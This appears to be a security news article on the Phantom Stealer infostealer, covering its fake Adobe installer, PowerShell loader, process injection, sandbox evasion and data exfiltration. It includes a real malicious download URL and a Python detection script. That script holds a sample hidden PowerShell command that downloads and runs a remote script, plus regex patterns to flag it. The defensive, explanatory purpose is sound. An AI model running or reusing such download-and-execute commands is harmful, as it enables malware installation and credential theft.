Phantom Stealer Attacking Users to Steal Sensitive Data like Passwords, Browser Cookies, Credit Card Data

Posted on December 18, 2025 by CWS

Phantom Stealer version 3.5 has emerged as a critical threat to users worldwide, capable of extracting sensitive information including passwords, browser cookies, credit card details, and cryptocurrency wallet data.

This sophisticated malware relies on deceptive packaging, often disguised as a legitimate Adobe software installer, making it difficult for unwary users to recognize the danger before infection occurs.

The attack begins with a fake Adobe 11.7.7 installer file, first identified on October 29, 2025. The file is actually an obfuscated XML document containing embedded JavaScript code designed to trigger a chain of malicious actions.

When executed, the file downloads a PowerShell script from a remote server, setting the stage for deeper system compromise and data collection.

K7 Security Labs researchers found that Phantom Stealer employs a multi-stage infection mechanism that demonstrates significant technical sophistication.

RC4 key and decryption (Source – K7 Security Labs)

The malware downloads an obfuscated PowerShell script from the URL positivepay-messages.com/file/ground.ps1, which runs with hidden attributes and bypasses security policies.

This script contains RC4-encrypted data that, once decrypted, reveals instructions for loading a .NET assembly directly into memory.

Malware execution flow (Source – K7 Security Labs)

The second phase involves the BLACKHAWK.dll injector, a critical component that performs process injection into the legitimate Windows utility Aspnetcompiler.exe.

This injection technique loads malicious code into a trusted system process, allowing the stealer to operate under the radar of security software.

The malware continuously checks, at five-second intervals, whether Aspnetcompiler.exe is running, ensuring persistent operation.
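As an added detection example (not code from the K7 Security Labs report or this article), the following Python scans constructed Sysmon-style process-creation events for the two behaviours described above: a hidden, policy-bypassing PowerShell fetching a remote .ps1, and Aspnetcompiler.exe (the .NET Framework binary itself is named aspnet_compiler.exe) being spawned by a script host rather than a build tool. The event field names, paths, PIDs and the download URL are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events; paths, PIDs and the
# download URL are assumptions, not indicators from the K7 report.
SAMPLE_EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\Downloads\Adobe_11.7.7_Setup.exe",
     "cmdline": ("powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                 "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/file/ground.ps1')")},
    {"pid": 4188,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "aspnet_compiler.exe"},
    {"pid": 5010,  # benign: a real precompile job launched from Visual Studio
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r"aspnet_compiler.exe -v / -p C:\src\site C:\build\site"},
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I)
REMOTE_PS1_RE = re.compile(r"https?://\S+\.ps1", re.I)
# The article names the host process Aspnetcompiler.exe; the .NET Framework
# binary on disk is aspnet_compiler.exe, so accept both spellings.
INJECTION_HOSTS = {"aspnetcompiler.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return the stage labels an event matches (empty list if benign)."""
    image, parent, cmd = basename(event["image"]), basename(event["parent_image"]), event["cmdline"]
    hits = []
    if (image in {"powershell.exe", "pwsh.exe"} and HIDDEN_RE.search(cmd)
            and BYPASS_RE.search(cmd) and REMOTE_PS1_RE.search(cmd)):
        hits.append("stage1: hidden, policy-bypassing PowerShell fetching a remote .ps1")
    if image in INJECTION_HOSTS and parent in SCRIPT_HOSTS:
        hits.append("stage2: aspnet_compiler.exe spawned by a script host (injection target)")
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map PID -> matched stages for every suspicious event; benign ones are dropped."""
    return {e["pid"]: h for e in events if (h := classify(e))}

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, "; ".join(hits))
```

The parent-process check is what separates the injection host from a legitimate precompile run: aspnet_compiler.exe launched by devenv.exe or a build agent is expected, the same binary launched by PowerShell is not.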

Process Injection and Evasion Techniques

Phantom Stealer leverages advanced evasion techniques to avoid detection and analysis. The malware implements numerous anti-analysis checks, including detection of virtual machines, sandboxes, and monitoring tools by matching the current username against a hardcoded list of 112 sandbox usernames.

base64 string (Source – K7 Security Labs)

If such an environment is detected, the malware self-destructs by creating a batch file that forcefully terminates its process.

Most notably, the stealer uses Heaven's Gate, a sophisticated user-mode hook evasion technique in which a 32-bit process transitions to 64-bit execution mode.

This allows the malware to bypass 32-bit user-mode hooks and perform native x64 syscalls directly, accessing sensitive data without triggering security mechanisms designed to monitor process behavior.

Once installed, Phantom Stealer extracts browser credentials, including Chrome and Edge data, by accessing the encrypted databases and decrypting them with extracted encryption keys.

The malware harvests cryptocurrency wallet credentials, Outlook email configurations, keylogged data, and system information, along with screenshots captured every 1000 milliseconds.

For data exfiltration, the stealer employs multiple channels, including SMTP, FTP, and communication platforms such as Telegram and Discord.

Stolen data is organized by computer name and timestamp, creating an orderly repository of victim information ready for malicious use.

Organizations should implement robust email filtering, regular software updates, and advanced endpoint protection to defend against this evolving threat.
